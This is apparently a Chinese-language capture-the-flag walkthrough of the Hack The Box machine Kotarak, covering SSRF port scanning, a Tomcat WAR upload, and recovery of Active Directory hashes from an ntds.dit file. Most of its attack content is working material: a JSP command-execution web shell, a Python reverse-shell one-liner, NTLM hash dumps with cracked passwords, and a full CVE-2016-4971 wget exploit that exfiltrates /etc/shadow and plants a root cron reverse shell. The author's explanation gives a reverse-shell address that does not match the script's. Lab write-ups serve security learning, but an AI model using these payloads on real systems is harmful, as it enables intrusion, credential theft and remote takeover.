[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…

2024-10-13 13 0

信息收集

IP Address Opening Ports
10.10.10.55 TCP:22,8009,8080,60000

$ nmap -p- 10.10.10.55 --min-rate 10000 -sC -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8080/tcp open  http    Apache Tomcat 8.5.5
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open     unknown 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSRF 端口扫描

http://10.10.10.55:8080/manager/status

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图

http://10.10.10.55:60000/

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图1

$ feroxbuster --url http://10.10.10.55:60000

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图2

$ time for i in {1..65535}; do res=$(curl -s http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A${i}); len=$(echo $res | wc -w); if [ "$len" -gt "0" ]; then echo -n "${i}: "; echo $res | tr -d "\r" | head -1 | cut -c-100; fi; done

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图3

http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A888

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图4

view-source:http://10.10.10.55:60000/url.php?path=http%3a%2f%2f127.0.0.1%3a888%3fdoc%3dbackup

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图5

username:admin password:3@g01PdhB!

tomcat war && DMZ

http://10.10.10.55:8080/manager/html

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图6

# gen_war.sh
#!/bin/sh 
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp 
rm -rf wshell 
rm -f wshell.war 
mkdir wshell    
cp index.jsp wshell/ 
cd wshell 
jar -cvf ../wshell.war *

http://10.10.10.55:8080/wshell/index.jsp

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图7

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

http://10.10.10.55:8080/wshell/rev.jsp

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图8

将python的反向shell代码上传

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.12",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")

执行

python3 /opt/tomcat/webapps/wshell/re.py

我卡在这里有段时间了...这里msf生成的war包会出现问题...shell似乎无法通过bash,php,jsp反弹。这个jsp后门命令执行存在问题...

强烈建议马上切到msf会话

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图9

ntds.dit 恢复

http://10.10.10.55:8080/wshell/index.jsp?sort=1&dir=%2fhome%2ftomcat%2fto_archive%2fpentest_data

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图10

下载这两个文件

$ impacket-secretsdump -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图11

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

查看哪些LM值可以破解

https://crackstation.net/

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图12

获得两个用户的结果

Administrator:f16tomcat!
atanas:Password123!

TRP00F 跳关

tomcat-DMZ用户直接提升ROOT

https://github.com/MartinxMax/trp00f/tree/master

$ python3 trp00f.py --lhost 10.10.16.12 --lport 10012 --rhost 10.10.16.12 --rport 10011 --http 1111

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图13

tomcat -> atanas

python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/tmp$ su atanas -

f16tomcat!

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图14

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图15

User.txt

93f844f50491ef797c9c1b601b4bece8

Privilege Escalation && wget Privilege Escalation

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图16

似乎与archive.tar.gz有关

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图17

authbind 是一个 Linux 工具,用于允许非特权用户绑定到低号端口(小于1024)

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图18

CVE-2016-4971是针对Wget版本< 1.18的一个巧妙的漏洞,它滥用了wget处理HTTP重定向到FTP服务器。当wget使用http重定向到另一个地址时,它将获取该文件,但仍将其保存为原始请求的文件名。

例如,如果wget向 http://a.com/a/a.txt 发送GET请求,服务器响应301或302重定向到 ftp://b.com/b.txt ,wget将获取该文件b.txt

当我们使用authbind监听80端口时10.0.3.1每2分钟会获取/archive.tar.gz一次

atanas@kotarak-dmz:/root$ authbind nc -lnvp 80

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图19

EXP

1.攻击者创建恶意 .wgetrc 文件 (案例攻击者机子)

echo "post_file = /etc/shadow" > .wgetrc
echo "output_document = /etc/cron.d/wget-root-shell" >> .wgetrc

2.攻击者启动 FTP 服务器 (案例攻击者机子)

$ python -m pyftpdlib -p 21 -w

3.靶机启动恶意 HTTP 服务器

# wget-exploit.py
# CVE-2016-4971

import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # This takes care of sending .wgetrc

       print "We have a volunteer requesting " + self.path + " by GET :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
       self.send_response(301)
       new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
       print "Sending redirect to %s \n"%(new_path)
       self.send_header('Location', new_path)
       self.end_headers()

   def do_POST(self):
       # In here we will receive extracted file and install a PoC cronjob

       print "We have a volunteer requesting " + self.path + " by POST :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       content_len = int(self.headers.getheader('content-length', 0))
       post_body = self.rfile.read(content_len)
       print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

       print "Sending back a cronjob script as a thank-you for the file..."
       print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(ROOT_CRON)

       print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

       return

HTTP_LISTEN_IP = '10.0.3.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.16.12'
FTP_PORT = 21

ROOT_CRON = "* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.16.12/10099 0>&1' \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
   print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
   print "FTP is down :( Exiting."
   exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

这个 Python 脚本是针对 CVE-2016-4971 漏洞的一个利用示例,具体作用如下:

  1. HTTP 服务器:它创建了一个简单的 HTTP 服务器,监听指定的 IP 地址和端口(10.0.3.1:80)。

  2. 处理 GET 请求:当收到 GET 请求时,脚本检查请求头中的 User-Agent 是否为 Wget。如果是,它会发送一个 301 重定向,指向一个 FTP 服务器(10.10.16.12:21),该服务器上存储了一个恶意的 .wgetrc文件。

  3. 处理 POST 请求:当收到 POST 请求时,脚本读取并打印从受害者机器提取的文件内容(通常是 /etc/shadow)。随后,它会发送一个恶意 cron 作业(ROOT_CRON)作为响应,这个 cron 作业会在每分钟执行,尝试建立一个反向 shell 连接到攻击者的机器(10.10.14.15:443)。

  4. FTP 检查:在服务器启动时,脚本会检查指定的 FTP 服务器是否可用。如果不可用,则退出。

$ authbind python2 wget-exploit.py

等待10.0.3.1请求两次后,大约4分钟后获取响应,并且从定时任务中触发反向shell

[Meachines] [Hard] Kotarak SSRF 端口扫描+AD域ntds.dit数据…插图20

Root.txt

950d1425795dfd38272c93ccbb63ae2c

相关文章:

  1. SSRF(一):PortSwigger靶场笔记
  2. Apache OFBiz SSRF to RCE(CVE-2024-45507) 漏洞分析
  3. [Meachines] [Easy] Optimum HFS文件管理2.3.x-RCE+MS16-0…
  4. [Meachines] [Easy] Safe BOF+ROP链+.data节区注入BOF+函数跳转…
  5. [Meachines] [Medium] Fuse smb+printer打印机配置泄露+SeLoa…

4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

4A测评
网络安全
0 0

相关文章

暴露内核内存并通过滥用COW机制实现一个注射器
403bypass问题简析
0day的产生 | 不懂代码的”代码审计”
某友NCCloud黑名单绕过分析
【论文速读】| AutoSafeCoder:通过静态分析和模糊测试保障LLM代码生成安全的多智能体框…
0day的产生 | 权限绕过的秘密

发布评论